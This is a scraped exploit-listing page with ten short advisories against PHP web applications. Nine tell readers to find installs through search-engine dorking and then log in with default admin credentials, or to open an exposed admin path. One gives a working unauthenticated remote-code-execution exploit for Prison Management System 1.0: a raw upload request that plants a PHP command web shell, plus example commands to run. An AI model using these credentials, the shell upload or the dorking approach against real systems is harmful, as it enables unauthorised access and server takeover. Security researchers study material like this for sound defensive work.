Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : quickjob 6.1 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://codecanyon.net/item/quickjob-job-board-php-script/25217096 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user&pass: admin [+] panel : https://www/127.0.0.1/xpressdigitalonline/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Prison Management System version 1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/untcarriercom/admin/?page=system_info Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Pharmacy Management System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/user/257130/activity | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clients Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Online Payment Hub System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://scriptmafia.org | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yoruban-witness.000webhostappcom/admin/?page=clients Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : innue business live chat v2.5 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/business-live-chat-software.php | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = admin [+] https://www/127.0.0.1/vmi1941086contaboservernet/login Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code># Exploit Title: Prison Management System 1.0 - Unuthenticated RCE # Date: 24.07.2024 # Exploit Author: Muhammet Ali Dak # Vendor Homepage: https://www.sourcecodester.com/sql/17287/prison-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=17287&title=Prison+Management+System+Using+PHP # Version: 1.0 # Tested on: Linux ## Unauthenticated users can access /Admin/add-admin.php address and they can upload malicious php file by changing Content-Type to image/jpeg instead of profile picture image without any authentication. POST /Admin/add-admin.php HTTP/1.1 Host: 192.168.60.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------84806108511207628902669766678 Content-Length: 1055 Origin: http://192.168.60.131 Connection: keep-alive Referer: http://192.168.60.131/Admin/add-admin.php Upgrade-Insecure-Requests: 1 Priority: u=0, i -----------------------------84806108511207628902669766678 Content-Disposition: form-data; name="txtusername" yuznumara -----------------------------84806108511207628902669766678 Content-Disposition: form-data; name="txtfullname" yuznumara -----------------------------84806108511207628902669766678 Content-Disposition: form-data; name="txtpassword" yuznumara123 -----------------------------84806108511207628902669766678 Content-Disposition: form-data; name="txtphone" 55353535353 -----------------------------84806108511207628902669766678 Content-Disposition: form-data; name="avatar"; filename="cmd.php" Content-Type: image/jpeg <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -----------------------------84806108511207628902669766678 Content-Disposition: form-data; name="btncreate" -----------------------------84806108511207628902669766678-- ## Malicious file can be seen under the path /uploadImage/Profile/ without any authentication. ## With the request http://192.168.60.131/uploadImage/Profile/cmd.php?cmd=whoami the attacker can execute arbitrary command on the application server. </code></pre>

<pre><code>==================================================================================================================================== | # Title : Multi Store Inventory Management System v1.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /dashboard/autoupdate [+] https://www/127.0.0.1/multistore_demo/dashboard/autoupdate Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Online Medicine Ordering System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/15359/online-medicine-ordering-system-phpoop-free-source-code.html | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/amarpharmacycom/admin/?page=user Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Online Discussion Forum Site v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : http://inodesys.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/rpglecom/admin/?page=user/manage_user&id=8 Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : LMS ZAI v6.3 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://codecanyon.net/item/lmszai-learning-management-system/38383087 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 123456 [+] https://www/127.0.0.1/studixpertcom/admin/user/create Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>